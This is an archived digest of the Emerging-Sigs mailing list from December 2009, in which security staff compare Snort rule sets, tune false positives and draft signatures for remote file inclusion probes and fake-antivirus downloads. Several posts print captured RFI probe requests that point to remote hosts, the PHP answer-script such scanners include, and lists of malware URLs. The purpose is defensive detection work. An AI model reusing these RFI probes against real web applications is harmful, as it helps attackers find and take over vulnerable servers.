In-Reply-To: <54D9A108-AE0C-4B39-9E4B-CA43E989EE06@auckland.ac.nz>
References: <6116b9e20912030906p7647df0exa625f9c71b4b3fa1@mail.gmail.com>	<04550DFF-5D70-4BD9-919A-098E0B1FD807@jonkmans.com>	<EBB1D200-BB8D-44AC-BE12-06E348B5FE38@auckland.ac.nz>	<4B18D619.6070707@windstream.net>
	<54D9A108-AE0C-4B39-9E4B-CA43E989EE06@auckland.ac.nz>
Message-ID: <4B1B8156.2070309@mare-system.de>


hi russel, 


i looked a little deeper into rfi last summer and found
a lot of scanners and answer-scripts (a scanners tries to
call a rfi-vuln on a site/webapp, either found through dorks 
or though bruteforce-tests by including a very simple script
that signals OK OK, vuln found!!!. 

you might check such a answer-script here:
http://hasslefreetours.co.za/wp-content/uploads/2008/01/idxx.txt

if you see the code you'll know how it works.

i basicyll found 5 or six different answer-scripts with
a lot of variants, but also (sometimes) rfi-tests with
including pictures and existing webpages and send a mail
from the php-script.

so, from my point of view, it would be possible to 
build some sigs around the "answer-scripts", indicating
a successfull rfi (and after this, a bot will be installed),
but only for known stuff. 



mex




> 
> Yes the open source CMS systems seem to be over represented :(  I
> think a large part of the problem is that they have lot of little bit
> and pieces that are contributed by amateurs and there does not seem
> to be any quality control that does even basic sanity checking.
> 
> On the snort side part of the problem I see 500 odd alerts as someone
> goes through our network poking at web vulnerability of the day.
> What I really want to know is which machines responded with something
> other than a file not found.  THe problem is compounded by many
> systems trapping 404s and sending back some flowery prose
> indistinguishable from a hit.  Sigh...
> 
> Any thought on analysing responses welcome!
> 
> Russell _______________________________________________ Emerging-sigs
> mailing list Emerging-sigs at emergingthreats.net 
> http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs
> 

From scheidell at secnap.net  Sun Dec  6 07:19:33 2009
From: scheidell at secnap.net (Michael Scheidell)
Date: Sun, 06 Dec 2009 07:19:33 -0500
Subject: [Emerging-Sigs] here's an interesting web exploit attempt,
	server variables
Message-ID: <4B1BA155.6060709@secnap.net>

picked up with snort sid:1156, directory discovery.

looks like they think that a couple spaces (%20%20) and some slashes 
will let you set server variable DOCUMENT_ROOT


000 : 47 45 54 20 2F 25 32 30 25 32 30 2F 2F 2F 2F 2F   GET /%20%20/////
010 : 2F 2F 2F 2F 2F 2F 2F 2F 2F 2F 2F 2F 2F 2F 2F 2F   ////////////////
020 : 2F 2F 2F 2F 3F 5F 53 45 52 56 45 52 5B 44 4F 43   ////?_SERVER[DOC
030 : 55 4D 45 4E 54 5F 52 4F 4F 54 5D 3D 68 74 74 70   UMENT_ROOT]=http
040 : 3A 2F 2F 77 77 77 2E 6A 62 69 64 73 6E 6F 77 2E   ://www.jbidsnow.
050 : 63 6F 6D 2F 69 6E 63 6C 75 64 65 73 2F 31 2E 74   com/includes/1.t
060 : 78 74 3F 20 48 54 54 50 2F 31 2E 31 0D 0A 54 45   xt? HTTP/1.1..TE
070 : 3A 20 64 65 66 6C 61 74 65 2C 67 7A 69 70 3B 71   : deflate,gzip;q
080 : 3D 30 2E 33 0D 0A 43 6F 6E 6E 65 63 74 69 6F 6E   =0.3..Connection
090 : 3A 20 54 45 2C 20 63 6C 6F 73 65 0D 0A 48 6F 73   : TE, close..Hos
0a0 : 74 3A 20 77 77 77 2E                              t: www.somebody1
0b0 : 2E 6E 65 74 0D 0A 55 73 65 72 2D 41 67 65 6E 74   .net..User-Agent
0c0 : 3A 20 4D 6F 7A 69 6C 6C 61 2F 35 2E 30 0D 0A 0D   : Mozilla/5.0...
0d0 : 0A                                                .

1.txt doesn't look like anything all that bad:

more 1.txt
zfxid.txt
<?php /* ZFxID */ echo("Shiro"."Hige"); echo("Shiro"."Hige"); /* ZFxID */ ?>


apache gives you a 404, so  does IIS . anyone who what this targets? 
anyone see this in their logs?


[06/Dec/2009:07:08:24 -0500] "GET 
/%20%20/////////////////////////?_SERVER[DOCUMENT_ROOT]=http://www.jbidsnow.com/includes/1.txt 
HTTP/1.0" 404 221 "-" "Wget/1.11.4"


-- 
Michael Scheidell, CTO
Phone: 561-999-5000, x 1259
 > *| *SECNAP Network Security Corporation

    * Certified SNORT Integrator
    * 2008-9 Hot Company Award Winner, World Executive Alliance
    * Five-Star Partner Program 2009, VARBusiness
    * Best Anti-Spam Product 2008, Network Products Guide
    * King of Spam Filters, SC Magazine 2008


_________________________________________________________________________
This email has been scanned and certified safe by SpammerTrap(r). 
For Information please see http://www.spammertrap.com
_________________________________________________________________________
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.emergingthreats.net/pipermail/emerging-sigs/attachments/20091206/562673db/attachment.html

From mail at mare-system.de  Sun Dec  6 11:24:09 2009
From: mail at mare-system.de (mex)
Date: Sun, 06 Dec 2009 17:24:09 +0100
Subject: [Emerging-Sigs] here's an interesting web exploit attempt,
 server variables
In-Reply-To: <4B1BA155.6060709@secnap.net>
References: <4B1BA155.6060709@secnap.net>
Message-ID: <4B1BDAA9.6050004@mare-system.de>





Michael Scheidell wrote:
...


> 
> 
> apache gives you a 404, so  does IIS . anyone who what this targets?
> anyone see this in their logs?
> 
> 
> [06/Dec/2009:07:08:24 -0500] "GET
> /%20%20/////////////////////////?_SERVER[DOCUMENT_ROOT]=http://www.jbidsnow.com/includes/1.txt
> HTTP/1.0" 404 221 "-" "Wget/1.11.4"
> 
> more 1.txt
> zfxid.txt
> <?php /* ZFxID */ echo("Shiro"."Hige"); echo("Shiro"."Hige"); /* ZFxID
> */ ?>

its the same type of rfi-scanner/answer-file i mentined earlier.

http://hasslefreetours.co.za/wp-content/uploads/2008/01/idxx.txt
<?php /* Fx29ID */ echo("FeeL"."CoMz"); die("FeeL"."CoMz"); /* Fx29ID */ ?>


the scanner "asks" your server for a vulnerability (rfi), and if it
is exploitable the answer is "ShiroHigeShiroHige" and then 
(and ONLY then) the real rfi-attack takes place (mostly rfi-bots); 
if the answer from your server is 404 or something different 
the scanner goes along to the next target. 

if someone wants more info on rfi-scanners/answer-script variants 
etc i have plenty of them ;-)




mex


From spooker at gmail.com  Sun Dec  6 12:07:11 2009
From: spooker at gmail.com (Rodrigo Montoro(Sp0oKeR))
Date: Sun, 6 Dec 2009 15:07:11 -0200
Subject: [Emerging-Sigs] Is the VRT ruleset worth it?
In-Reply-To: <4B18D619.6070707@windstream.net>
References: <6116b9e20912030906p7647df0exa625f9c71b4b3fa1@mail.gmail.com> 
	<04550DFF-5D70-4BD9-919A-098E0B1FD807@jonkmans.com>
	<EBB1D200-BB8D-44AC-BE12-06E348B5FE38@auckland.ac.nz> 
	<4B18D619.6070707@windstream.net>
Message-ID: <9255886c0912060907u7aa484b4t130bb6b9bccdf4d0@mail.gmail.com>

Only looking at Rules headers options already show big differences.


VRT TOP30 (not counting SO_RULES)

$ cat *.rules | grep msg |sed -e s/'^# '//g | sed -e s/^#//g| cut -d"
" -f1,2,3,4,5,6,7 | sort | uniq -c | sort -nr | head -30

  2715 alert tcp $EXTERNAL_NET $HTTP_PORTS -> $HOME_NET any
    989 alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS
    987 alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS
    316 alert tcp $EXTERNAL_NET any -> $SQL_SERVERS $ORACLE_PORTS
    191 alert tcp $HOME_NET any -> $EXTERNAL_NET 25
    160 alert tcp $HOME_NET any -> $EXTERNAL_NET any
    144 alert tcp $EXTERNAL_NET any -> $HOME_NET any
    117 alert icmp $EXTERNAL_NET any -> $HOME_NET any
     98 alert tcp $EXTERNAL_NET any -> $SMTP_SERVERS 25
     98 alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS
     90 alert tcp $EXTERNAL_NET any -> $HOME_NET 21
     86 alert tcp $EXTERNAL_NET any -> $HOME_NET 445
     84 alert tcp $EXTERNAL_NET any -> $HOME_NET 139
     58 alert udp $EXTERNAL_NET any -> $HOME_NET 5060
     56 alert tcp $EXTERNAL_NET any -> $HOME_NET 143
     51 alert udp $EXTERNAL_NET any -> $HOME_NET 138
     49 alert tcp $EXTERNAL_NET any -> $HOME_NET [139,445]
     47 alert tcp $EXTERNAL_NET any -> $SQL_SERVERS 1433
     38 alert udp $EXTERNAL_NET any -> $HOME_NET any
     38 alert tcp $EXTERNAL_NET any -> $HOME_NET 111
     37 alert ip $EXTERNAL_NET any -> $HOME_NET any
     34 alert udp $EXTERNAL_NET any -> $HOME_NET 111
     31 alert tcp $HOME_NET 1024: -> $EXTERNAL_NET any
     27 alert tcp $EXTERNAL_NET any -> $HOME_NET 25
     27 alert tcp $EXTERNAL_NET any -> $HOME_NET 1024:
     26 alert udp $EXTERNAL_NET any -> $HOME_NET 9600
     26 alert tcp $EXTERNAL_NET any -> $SQL_SERVERS 139
     22 alert tcp $EXTERNAL_NET any -> $TELNET_SERVERS 23
     22 alert tcp $EXTERNAL_NET any -> $HOME_NET 110
     20 alert tcp $EXTERNAL_NET any -> $HOME_NET [135,139,445,593,1024:]



ET TOP30

$ cat *.rules | grep msg |sed -e s/'^# '//g | sed -e s/^#//g| cut -d"
" -f1,2,3,4,5,6,7 | sort | uniq -c | sort -nr | head -30

   4410 alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS
   1820 alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS
    436 alert tcp $EXTERNAL_NET $HTTP_PORTS -> $HOME_NET any
    148 alert tcp $EXTERNAL_NET any -> $HOME_NET any
    112 alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS
    103 alert tcp $HOME_NET 1024: -> $EXTERNAL_NET 1024:
     75 alert tcp $SMTP_SERVERS any -> $EXTERNAL_NET 25
     60 alert tcp $HOME_NET any -> $EXTERNAL_NET any
     55 alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any
     47 alert tcp $HOME_NET any -> $EXTERNAL_NET 1024:
     40 alert tcp $HOME_NET any -> $EXTERNAL_NET 25
     34 alert tcp $EXTERNAL_NET any -> $HOME_NET 21
     34 alert tcp any any -> any any
     24 alert tcp $EXTERNAL_NET 6112 -> $HOME_NET any
     22 alert udp any any -> any any
     21 alert udp $HOME_NET 1024:65535 -> $EXTERNAL_NET 1024:65535
     21 alert tcp $HOME_NET any -> $EXTERNAL_NET 1024:65535
     21 alert tcp $EXTERNAL_NET 1024:65535 -> $HOME_NET any
     17 alert tcp $EXTERNAL_NET 32768:61000 -> $HOME_NET 1024:65535
     17 alert tcp $EXTERNAL_NET 1024:5000 -> $HOME_NET 1024:65535
     16 alert tcp $HTTP_SERVERS $HTTP_PORTS -> $EXTERNAL_NET any
     16 alert tcp any any -> $HOME_NET 445
     16 alert ip any any -> any any
     15 alert udp $EXTERNAL_NET any -> $HOME_NET 5060
     15 alert tcp $EXTERNAL_NET any -> $HOME_NET 445
     15 alert tcp any any -> $HOME_NET 139
     13 alert tcp $EXTERNAL_NET 1024: -> $HOME_NET any
     12 alert tcp $EXTERNAL_NET any -> $HOME_NET 25
     11 alert udp any any -> $HOME_NET 139
     10 alert tcp $HOME_NET any -> $EXTERNAL_NET 6112


Regards,


On Fri, Dec 4, 2009 at 7:27 AM, waldo kitty <wkitty42 at windstream.net> wrote:
> Russell Fulton wrote:
>> On 4/12/2009, at 7:51 AM, Matt Jonkman wrote:
>>
>>> Very good question, I get asked it frequently in consulting.
>>>
>>> My answer is you need both. Your points are valid, SF goes after the top 20 sans, the latest and greatest netbios exploit, etc. Safe reliable and well tested stuff.
>>>
>>> ET is more malware, we have a huge sandnet and a lot of other intelligence gathering going on. If you want to catch command and control channels, the latest and greatest outbreaks, you need the ET set.
>>>
>>> So I recommend running them in parallel, but you have to do some tweaking to eliminate duplications and get rid of the rules you're not interested in as always.
> @matt,
> i cannot agree more... see below for further ;)
>
>>
>> Also depends on your environment. ?I have been running both (we pay the VRT sub). ?We are a large university and my sensors are starting to melt down under the load so I am looking to cut the number of rules and thus the load. ?I post process the alerts looking for things I know to be reliable indications of trouble -- most usually malware. ?I have a list of about 100 sids that I take particular note of and almost all start with 200....
>
> very much so... i'm always spending my time trying to explain to those using my
> snort related apps that they cannot simply accept the defaults and be done with
> it... especially if they are running servers and they are wanting to protect
> them... the same is to be said if they are only looking to protect their
> users... server related rules are simply noise if they are not protecting
> servers... the same goes for the other side of the coin, too...
>
>> So you can guess which I'm going to drop if I have to. ?But *I* am primarily interested in who has been hit by the latest drive by download, duped into installing a new codec or simply mounted a student's USB drive to get the latest version of their thesis (with bonus extras :).
>>
>> We have around 500 IPs exposed that respond on port 80 (if the snort reports on the latest searches for setup.php are to be believed). With this many machines there is now way I can respond to individual alerts on port 80. ?What I use snort for here is as weather vane to help me focus my limited resources. Do should I be chasing joomla or moodle sites this week :)
>
> the answer to this question is "yes" ;) especially if you are also looking at
> the SANS @RISK postings... joomla is one of the most prominent apps listed... in
> fact, watching the @RISK list almost makes me simply want to turn it all off
> with all the notices of all the holes and such in so many commonly used apps :?
> :? :(
>
>> If you have few web servers and a bunch of rigidly locked down desktops then VRT may be best if you can run both...
>
> definitely agreed there!
>
>
> _______________________________________________
> Emerging-sigs mailing list
> Emerging-sigs at emergingthreats.net
> http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs
>



-- 
Rodrigo Montoro (Sp0oKeR)
http://www.spooker.com.br
http://www.twitter.com/spookerlabs
http://www.linkedin.com/in/spooker

From r.fulton at auckland.ac.nz  Sun Dec  6 13:14:20 2009
From: r.fulton at auckland.ac.nz (Russell Fulton)
Date: Mon, 7 Dec 2009 07:14:20 +1300
Subject: [Emerging-Sigs] alerting on responses (rfi-based)
In-Reply-To: <4B1B8156.2070309@mare-system.de>
References: <6116b9e20912030906p7647df0exa625f9c71b4b3fa1@mail.gmail.com>
	<04550DFF-5D70-4BD9-919A-098E0B1FD807@jonkmans.com>
	<EBB1D200-BB8D-44AC-BE12-06E348B5FE38@auckland.ac.nz>
	<4B18D619.6070707@windstream.net>
	<54D9A108-AE0C-4B39-9E4B-CA43E989EE06@auckland.ac.nz>
	<4B1B8156.2070309@mare-system.de>
Message-ID: <2B06ADD8-124A-4D2E-ADE5-F1D13FA5C3FA@auckland.ac.nz>


On 6/12/2009, at 11:03 PM, mex wrote:

> 
> hi russel, 
> 
> 
> i looked a little deeper into rfi last summer and found
> a lot of scanners and answer-scripts (a scanners tries to
> call a rfi-vuln on a site/webapp, either found through dorks 
> or though bruteforce-tests by including a very simple script
> that signals OK OK, vuln found!!!. 
> 
> you might check such a answer-script here:
> http://hasslefreetours.co.za/wp-content/uploads/2008/01/idxx.txt
> 

Thanks Mex!

That one has been taken down, but yes, I know what you mean.  Include remote file that has a little program in JS, php, whatever you are trying to hit that display "0wned".

I had not thought of trying to detect these as I assumed that there would be too many variants to make it worthwhile.

Russe''

From mail at mare-system.de  Sun Dec  6 14:14:14 2009
From: mail at mare-system.de (mex)
Date: Sun, 06 Dec 2009 20:14:14 +0100
Subject: [Emerging-Sigs] what has happened to 2002997 / ET WEB PHP Remote
 File Inclusion (monster list http)
Message-ID: <4B1C0286.5090708@mare-system.de>


dont find it anymore

this one is from  september.


alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"ET WEB PHP Remote File Inclusion (monster list http)"; flow:established,to_server; uricontent:".php"; nocase; uricontent:"http"; nocase; pcre:"/(path|page|lib|dir|file|root|icon|lang(uage)?|folder|type|agenda|gallery|domain|calendar|settings|news|name|auth|prog|config|cfg|incl|ext|fad|mod|sbp|rf|id|df|[a-z](\[.*\])+)\s*=\s*https?/Ui"; reference:url,www.sans.org/top20/; classtype:web-application-attack; reference:url,doc.emergingthreats.net/2002997; reference:url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB/WEB_PHP; sid:2002997; rev:4;)



mex

From emerging at emergingthreats.net  Sun Dec  6 16:00:12 2009
From: emerging at emergingthreats.net (emerging@emergingthreats.net)
Date: Sun,  6 Dec 2009 16:00:12 -0500 (EST)
Subject: [Emerging-Sigs] Emerging Threats Daily Signature Changes
Message-ID: <20091206210012.924164504F@goliath.jonkmans.com>


[***] Results from Oinkmaster started Sun Dec  6 16:00:12 2009 [***]

[*] Rules modifications: [*]
    None.

[---]     Removed non-rule lines:    [---]

     -> Removed from emerging-sid-msg.map (16):
        2500536 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (269) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500537 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (269) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500538 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (270) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500539 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (270) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500540 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (271) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500541 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (271) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500542 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (272) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500543 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (272) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510536 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (269) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510537 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (269) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510538 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (270) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510539 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (270) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510540 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (271) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510541 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (271) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510542 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (272) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510543 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (272) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts

     -> Removed from emerging-sid-msg.map.txt (16):
        2500536 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (269) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500537 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (269) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500538 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (270) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500539 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (270) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500540 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (271) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500541 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (271) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500542 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (272) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500543 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (272) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510536 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (269) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510537 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (269) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510538 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (270) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510539 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (270) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510540 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (271) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510541 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (271) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510542 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (272) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510543 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (272) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts


From jason.weir at nhrs.org  Mon Dec  7 06:00:25 2009
From: jason.weir at nhrs.org (jason.weir@nhrs.org)
Date: 7 Dec 2009 06:00:25 -0500
Subject: [Emerging-Sigs] Malwareurl.com Top 30 Update
Message-ID: <MAIL2wZ3FLwsldxWat60000002e@mail.nhrs.org>

MalewareURL.com Data Contains 48458 Entries - Here are the top 30 (9073)

#    Signature       URI                                                Count    Description                                       
----------------------------------------------------------------------------------------

1    none            cache/readme.pdf                                   941      exploits / redirects to exploits                  
2    none            index.php                                          919      exploits / redirects to exploits                  
3    2010222         ts/in.cgi?pepsi18                                  895      exploits / redirects to exploits                  
4    none            o.js                                               744      redirects to rogue antivirus                      
5    none            index.php                                          609      exploits                                          
6    none            download/install.php                               584      rogue antivirus                                   
7    new             downloader.php                                     364      fraudtool.win32.roguesecurity                     
8    none            download/install.php                               331      rogue antivirus downloader / internetantiviruspro 
9    none            cache/flash.swf                                    276      exploits / redirects to exploits                  
10   none            load.php                                           257      exploits / trojan                                 
11   none            download.php                                       246      rogue antivirus                                   
12   none            cache/readme.pdf                                   227      exploits / trojan                                 
13   none            img/index.html                                     225      redirects to trojan                               
14   none            cache/flash.swf                                    207      exploits / trojan                                 
15   2010440         flash-HQ-plugin.40000.exe                          187      fast flux trojan                                  
16   2010050         download/Antivirus_21.exe                          165      rogue antivirus / personal antivirus - fakexpa    
17   none            installer.1.exe                                    148      rogue antivirus downloader / fakeplus             
18   2010221         3/installer/Installer.exe                          139      trojan fakerean                                   
19   2010221         1/installer/Installer.exe                          139      trojan fakerean                                   
20   2010221         2/installer/Installer.exe                          139      trojan fakerean                                   
21   new             ssp/js/common.js                                   138      exploit kit / trojan oficla                       
22   new             ssp/files/annonce.pdf                              138      exploit kit / trojan oficla                       
23   new             ssp/files/sdfg.jar                                 138      exploit kit / trojan oficla                       
24   new             ssp/admin.php                                      138      exploit kit / trojan oficla                       
25   new             ssp/index.php                                      138      exploit kit / trojan oficla                       
26   new             ssp/load.exe                                       138      exploit kit / trojan oficla                       
27   new             ssp/loadjavad.php                                  138      exploit kit / trojan oficla                       
28   new             download/IAInstall.exe                             132      rogue antivirus downloader / internetantiviruspro 
29   none            installer_1.exe                                    118      rogue antivirus downloader / fakeplus             
30   none            op1.js=http://www.theriverlive.cn                  115      redirects to rogue antivirus                      

From scheidell at secnap.net  Mon Dec  7 07:06:34 2009
From: scheidell at secnap.net (Michael Scheidell)
Date: Mon, 07 Dec 2009 07:06:34 -0500
Subject: [Emerging-Sigs] FP [Fwd: alert: New event: ET USER_AGENTS
 Suspicious Mozilla User-Agent - Likely Fake (Mozilla/5.0)]
Message-ID: <4B1CEFCA.1050309@secnap.net>


12/07-08:58:17 TCP 10.100.10.151:1118 --> 76.13.14.40:80
[1:2009295:4] ET USER_AGENTS Suspicious Mozilla User-Agent - Likely Fake 
(Mozilla/5.0)
[Classification: A Network Trojan was detected] [Priority: 1]

so many (legit?) programs try to fake user-agent in order to be 
'compatible'.  might not be worth chasing FP's, but maybe it beats just 
disabling this family.

here is one, during yahoo chat:
vcs2.msg.vip.ac4.yahoo.com

000 : 47 45 54 20 2F 63 61 70 61 63 69 74 79 20 48 54   GET /capacity HT
010 : 54 50 2F 31 2E 31 0D 0A 43 61 63 68 65 2D 43 6F   TP/1.1..Cache-Co
020 : 6E 74 72 6F 6C 3A 20 6E 6F 2D 63 61 63 68 65 0D   ntrol: no-cache.
030 : 0A 48 6F 73 74 3A 20 76 63 73 32 2E 6D 73 67 2E   .Host: vcs2.msg.
040 : 79 61 68 6F 6F 2E 63 6F 6D 0D 0A 55 73 65 72 2D   yahoo.com..User-
050 : 41 67 65 6E 74 3A 20 4D 6F 7A 69 6C 6C 61 2F 35   Agent: Mozilla/5
060 : 2E 30 0D 0A 43 6F 6E 6E 65 63 74 69 6F 6E 3A 20   .0..Connection:
070 : 43 6C 6F 73 65 0D 0A 0D 0A                        Close....

old rule:

alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"ET 
USER_AGENTS Suspicious Mozilla User-Agent - Likely Fake (Mozilla/5.0)"; 
flow:to_server,established; content:"User-Agent\: Mozilla/5.0|0d 0a|"; 
nocase; classtype:trojan-activity; 
reference:url,doc.emergingthreats.net/2009295; 
reference:url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/USER_AGENTS/USER_Agents_Suspicious; 
sid:2009295; rev:4;)

suggest:
alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"ET 
USER_AGENTS Suspicious Mozilla User-Agent - Likely Fake (Mozilla/5.0)"; 
flow:to_server,established; content:"User-Agent\: Mozilla/5.0|0d 0a|"; 
nocase; content: ! "Mozilla/5.0|0d 0a|Connection\: Close|0d0a0d0a|"; 
classtype:trojan-activity; 
reference:url,doc.emergingthreats.net/2009295; 
reference:url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/USER_AGENTS/USER_Agents_Suspicious; 
sid:2009295; rev:5;)




-- 
Michael Scheidell, CTO
Phone: 561-999-5000, x 1259
 > *| *SECNAP Network Security Corporation

    * Certified SNORT Integrator
    * 2008-9 Hot Company Award Winner, World Executive Alliance
    * Five-Star Partner Program 2009, VARBusiness
    * Best Anti-Spam Product 2008, Network Products Guide
    * King of Spam Filters, SC Magazine 2008


_________________________________________________________________________
This email has been scanned and certified safe by SpammerTrap(r). 
For Information please see http://www.secnap.com/products/spammertrap/
_________________________________________________________________________
   

From jason.weir at nhrs.org  Mon Dec  7 08:58:04 2009
From: jason.weir at nhrs.org (Weir, Jason)
Date: Mon, 7 Dec 2009 08:58:04 -0500
Subject: [Emerging-Sigs] Back At it
Message-ID: <F236CDCE34685A458D315422458642E201D30836@pine.nhrs.org>

Seeing these start up again this morning - not sure if Matt removed the
rules or not....

DHL_Label_97c78.zip
Facebook_Password_6acd6.zip

-Jason


_____________________________________________________________________________________________

Please visit www.nhrs.org to subscribe to NHRS email announcements and updates.

From evilghost at packetmail.net  Mon Dec  7 09:13:35 2009
From: evilghost at packetmail.net (evilghost@packetmail.net)
Date: Mon, 7 Dec 2009 08:13:35 -0600
Subject: [Emerging-Sigs] Malwareurl.com Top 30 Update
In-Reply-To: <MAIL2wZ3FLwsldxWat60000002e@mail.nhrs.org>
References: <MAIL2wZ3FLwsldxWat60000002e@mail.nhrs.org>
Message-ID: <4B1D0D8F.10508@packetmail.net>

Thoughts on:

alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"ET TROJAN - 
Potential Fake AV GET installer.1.exe"; flow:established,to_server; 
content:"GET "; depth:4; nocase; uricontent:"installer."; nocase; 
uricontent:".exe"; nocase; within:5; pcre:"/installer\.\d+\.exe/Ui"; 
classtype:trojan-activity; reference:url,www.malwareurl.com; 
sid:2010xxx; rev:1;)

alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"ET TROJAN - 
Potential Fake AV GET installer_1.exe"; flow:established,to_server; 
content:"GET "; depth:4; nocase; uricontent:"installer_"; nocase; 
uricontent:".exe"; nocase; within:5; pcre:"/installer_\d+\.exe/Ui"; 
classtype:trojan-activity; reference:url,www.malwareurl.com; 
sid:2010xxx; rev:1;)

Someone double-check me on the within, it's still early and I'm not sure 
I understood what the manual was telling me.

-evilghost


jason.weir at nhrs.org wrote:
> MalewareURL.com Data Contains 48458 Entries - Here are the top 30 (9073)
>
> #    Signature       URI                                                Count    Description                                       
> ----------------------------------------------------------------------------------------
>
> 1    none            cache/readme.pdf                                   941      exploits / redirects to exploits                  
> 2    none            index.php                                          919      exploits / redirects to exploits                  
> 3    2010222         ts/in.cgi?pepsi18                                  895      exploits / redirects to exploits                  
> 4    none            o.js                                               744      redirects to rogue antivirus                      
> 5    none            index.php                                          609      exploits                                          
> 6    none            download/install.php                               584      rogue antivirus                                   
> 7    new             downloader.php                                     364      fraudtool.win32.roguesecurity                     
> 8    none            download/install.php                               331      rogue antivirus downloader / internetantiviruspro 
> 9    none            cache/flash.swf                                    276      exploits / redirects to exploits                  
> 10   none            load.php                                           257      exploits / trojan                                 
> 11   none            download.php                                       246      rogue antivirus                                   
> 12   none            cache/readme.pdf                                   227      exploits / trojan                                 
> 13   none            img/index.html                                     225      redirects to trojan                               
> 14   none            cache/flash.swf                                    207      exploits / trojan                                 
> 15   2010440         flash-HQ-plugin.40000.exe                          187      fast flux trojan                                  
> 16   2010050         download/Antivirus_21.exe                          165      rogue antivirus / personal antivirus - fakexpa    
> 17   none            installer.1.exe                                    148      rogue antivirus downloader / fakeplus             
> 18   2010221         3/installer/Installer.exe                          139      trojan fakerean                                   
> 19   2010221         1/installer/Installer.exe                          139      trojan fakerean                                   
> 20   2010221         2/installer/Installer.exe                          139      trojan fakerean                                   
